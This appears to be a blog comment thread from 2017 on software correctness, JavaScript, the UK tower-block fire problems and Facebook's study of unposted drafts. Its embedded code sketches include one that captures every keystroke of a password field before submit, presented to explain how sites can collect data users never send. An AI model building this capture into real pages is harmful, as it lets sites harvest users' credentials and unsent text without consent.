In other words, use Hoare’s first method of constructing software: make it so simple that it is obviously correct.

This comes up a lot in code reviews. If the writer cannot convince the reviewer that the code is correct, the code should be rejected; the reviewer should not be required to produce a test case demonstrating that the code is wrong.
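Anon’s point can be made concrete: for a specific program with a strictly decreasing, bounded “variant”, a halting proof is trivial, even though the halting problem is undecidable for arbitrary programs. A minimal sketch (the choice of Euclid’s algorithm and the function name are mine, not Anon’s):

```javascript
// Euclid's gcd: provably terminating because on each iteration the
// second argument strictly decreases (a % b < b) while staying >= 0.
// A well-founded decreasing measure like this is exactly what makes
// a termination proof easy for one concrete program.
function gcd(a, b) {
  while (b !== 0) {
    [a, b] = [b, a % b]; // the variant b strictly decreases here
  }
  return a;
}

console.log(gcd(48, 18)); // 6
```

This is “Hoare’s first method” in miniature: the loop is simple enough that its correctness and termination are obvious on inspection.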

Ross Snider June 30, 2017 3:45 PM

@Major

The difference between Free Software and Open Source is pretty clear, but is also (unfortunately) widely misunderstood. It’s a tangent, so let’s not go into it here. The Free Software Foundation does a good job popularizing the difference: https://fsf.org/

I really don’t follow your argument. You seem to be describing the uselessness of all the regulation and auditing you have experienced while at the same time recommending more.

The recommendation is that market system and justice system forces (post-hoc forces) are brought to bear on the software industry rather than merely ex-ante good faith regulation.

I am not saying that fraud or deception should not be punishable, but holding software developers to unrealistic and largely inefficient standards, despite the fact that they readily admit their code is not perfect, is just silly make-believe that can do nothing more than stunt the industry, and effectively stunt the progress of every field that uses computers. The first versions of anything interesting will have significant flaws. No flaws means no innovation.

Right I would agree with this. No unrealistic or largely inefficient standards. We’re on the same page.

And really I would like to see a set of unambiguous standards that ensure that code is secure or accurate. Standards that actually can be reliably applied and whose application can be verified. And who would determine these standards are correct?
Ultimately politicians or bureaucrats who know nothing about the subject, no?

Right you seem to have an understanding of how ex-ante good faith regulation is going to fail.

As far as I can tell you agree quite completely with all of the recommendations I’ve laid out, but there’s some points of confusion that are (IMO) probably not worth our time trying to clear up.

Georgina June 30, 2017 5:36 PM

Clive,

As I mentioned the other day about having Javascript disabled, the final nail in the Javascript coffin as far as I was concerned was Google’s auto-compleat.

Way back in 2002/2003, I turned off Javascript because of a line of code on google.com that was pure evil: in the onload handler, they’d clear the search textbox. It must have worked fine from Google’s datacenter, but on my slow connection I could have typed half the query before the page was fully loaded and it got cleared. (When I heard about autocomplete I was glad I had JS disabled. That’s exactly the kind of feature I don’t want.)

I was going to check the exact date from the Wayback machine, but sadly the developers have broken it: “The Wayback Machine requires your browser to support JavaScript, please email info@archive.org if you have any questions about this.” I can’t even guess what feature they wanted to add that was so important they broke the non-JS version.
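The behaviour Georgina describes takes only one line in an onload handler. A speculative reconstruction (the field is a plain object standing in for the search input, since the real markup from 2002-era google.com isn’t available to verify):

```javascript
// Stand-in for the search <input>; in the real page this would be
// something like a DOM form field reached from document.forms.
const searchBox = { value: "" };

// On a slow connection the user types before the page finishes loading...
searchBox.value = "form data grab";

// ...then the onload handler fires and wipes the half-typed query.
// Fast from the datacenter, infuriating over dial-up.
function onloadHandler() {
  searchBox.value = "";
}
onloadHandler();

console.log(JSON.stringify(searchBox.value)); // ""
```

The bug is invisible to anyone testing on a fast link: by the time they start typing, onload has long since fired.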

Georgina June 30, 2017 7:08 PM

Only now is it being discovered that of the near 150 towerblocks that have been tested in the past few days 100% of them fail basic fire safety tests with respect to the cladding.

And then there’s the other problem that’s shocking to non-UK people: a single exit stairwell. Other regulators figured this out 150 years ago: “In 1862, the [New York City] law required fire escapes to be retroactively installed on all existing tenements.” Rats, badgers and woodchucks were building secondary escape tunnels from their burrows long before then.

Major June 30, 2017 9:03 PM

@Ross I guess what we had there was a failure to communicate! As far as open source vs Libre goes (I didn’t see anything specific about this following your link), my logic is that Libre requires source to be open (Libre->OS). And as far as I can see, having source available under a GPL license (at least a recent one) is sufficient for it to be Libre (OS->Libre). Hence OS == Libre.

@Anon I think your point that termination can be proven for some programs is worth remembering but hardly worth an AARGH since it is trivially true and obvious. Someone who understands Turing theory at all would know that. Agda is an interesting language that only allows terminating programs to be written (with provisos) and it couldn’t hurt to use such a language if termination was essential. But I’d say that functional and security properties are harder to prove than termination of a program written under limitations that enforce termination. Many properties can be translated to termination conditions under transformed programs but proving that those transformed programs terminate is harder than writing ones that you know do.

A language that removes the possibility of certain bugs (I’m thinking of how golang prevents common C language errors) is also worth using, but it still leaves other errors open. Yes, it is possible to write verifiable programs, but I think the extreme cost of doing that with current technology needs to be justified by a critical need; otherwise I’d rather spend all that extra time writing more useful, if potentially subtly flawed, functionality.

@Clive I think I personally would rather program than attend those standards meetings! Many systems development methodologies have been put forward as obvious requirements for good system design, only to yield failed projects or bad software anyhow, and be replaced by the next dogma. I once had the responsibility of developing standards for a large project and I look back in shame at my foisting of a half baked programming religion on those poor souls, however much they seemed to enjoy it! Quoting Bob Dylan: “I was so much older then, I’m younger than that now.”

tyr June 30, 2017 11:58 PM

@Georgina

It probably happened during the great leap forward of the archive.org interface. This was bitterly fought over and resisted by the most active users, but it was jammed in somewhere over the objections of the consensus. A perfect example of what happens when the programming in-crowd thinks they know best on any subject. Sometimes you can use the standards to hold their feet to the fire after an egregious screw-up, but usually it is a waste of time to complain to an ‘expert’.

The word Engineer has far too many divergent groups claiming it and far too many sets of qualifications to make it dependable. Most of the drop-outs in math and science wind up in civil engineering, and they in turn build the random VR you are forced to live in by default.

xinxingren July 1, 2017 4:21 PM

While javascript is guilty of the auto-complete “feature”, there is a heap of other obnoxiousness now available via CSS, like mouse-over pop-ups, and once it’s been served to you, they know you’ve “seen” it. If you’re on the internet “they” know you’re there. Like in NYPD: “Be careful out there.”

mostly harmful July 2, 2017 3:28 AM

Magazine article from 2013: 71% of Facebook Users Engage in ‘Self-Censorship’
https://www.theatlantic.com/technology/archive/2013/04/71-of-facebook-users-engage-in-self-censorship/274982/

Excerpt:

Most Americans now know the feeling of typing something into a social media input box, thinking again, and deciding against posting whatever it was. But while it certainly seemed like a widespread phenomenon, no one had actually quantified the extent of this “self-censorship.”

But now, new research based on a sample of 3.9 million Facebook users reveals precisely how widespread this activity is. Carnegie Mellon PhD student Sauvik Das and Facebook’s Adam Kramer measured how many people typed more than five characters into Facebook content-input boxes, but then did not post them. They term this “last-minute self-censorship.” The research was posted to Das’ website and will be presented at the Association for the Advancement of Artificial Intelligence’s conference on Weblogs and Social Media in July [NB: in 2013].

The numbers are impressively large. Fully one-third of all Facebook posts were self-censored, according to the method Das and Kramer devised, though they warn they probably captured a substantial number of false positives. 71 percent of all the users surveyed engaged in some self-censorship either on new posts or in comments, and the median self-censorer did so multiple times.

The magazine article’s links to the research are, of course, broken.

But a current download page for the research paper is here: https://research.fb.com/publications/self-censorship-on-facebook/
Current link to pdf: https://research.fb.com/wp-content/uploads/2016/11/self-censorship-on-facebook.pdf
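The metric summarised above is easy to sketch: a user counts as self-censoring if they typed more than five characters into a content box but never posted. The field names and threshold handling below are my illustration, not the paper’s actual code:

```javascript
// "Last-minute self-censorship" rate, per the summary above:
// fraction of sessions where more than five characters were typed
// into a content box but nothing was ever posted.
function selfCensorshipRate(sessions) {
  const censored = sessions.filter(
    s => s.maxTyped > 5 && !s.posted
  ).length;
  return censored / sessions.length;
}

// Hypothetical session log: maxTyped is the longest draft length seen.
const sessions = [
  { maxTyped: 42, posted: false }, // typed a rant, thought better of it
  { maxTyped: 12, posted: true },
  { maxTyped: 3,  posted: false }, // too short to count
  { maxTyped: 30, posted: false },
];
console.log(selfCensorshipRate(sessions)); // 0.5
```

Note that measuring this at all requires the page to observe drafts the user never submitted, which is the whole point of the article above.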

LateToTheParty July 6, 2017 1:53 PM

Something I’ve always wondered….

I go to a site and enter my registered email and password. Login fails because I entered my email password, not the password to the site. I enter the correct password, login, and go about my business.

Did the site capture the incorrect password so that it could then be tested against my email provider?

Late to the Party July 6, 2017 1:57 PM

Something I’ve always wondered….

I go to a site and enter my registered email and password, but the login fails because I typed my email password instead of my password for the site. I correct my mistake and go about my business.

What stops the site from testing the incorrect password entered against my email account? (I do use 2FA, but still I wonder.)
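Nothing technical stops it: once the site’s JavaScript runs in the page, every keystroke is available to it before any submit. A sketch of the pre-submit capture pattern the article describes (`captureField` and the `send` callback are hypothetical names; in a browser a real tracker might ship each value out with `navigator.sendBeacon`):

```javascript
// Hand every intermediate value of a form field to a transmit
// callback: the "grab before submit" pattern from the article.
// In a browser this would hang off an "input" event listener;
// here the typing is simulated so the sketch runs anywhere.
function captureField(send) {
  return function onInput(value) {
    // A real tracker might batch or debounce; the point is the
    // server sees the data with no submit involved.
    send(value);
  };
}

const serverLog = []; // what the site's server would receive
const onInput = captureField(v => serverLog.push(v));

// User types a password into the wrong box, then closes the tab
// without ever pressing "submit"...
for (const v of ["h", "hu", "hun", "hunter2"]) onInput(v);

console.log(serverLog.length); // 4: every keystroke already left the browser
```

So the only protections are legal and reputational ones, plus your own habits (2FA, as you mention, and unique passwords per site).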

latertotheparty July 6, 2017 2:15 PM

LateToTheParty
+1
Although I have thought about that sort of thing too, I am glad you wrote about it, and about others sniffing the network.

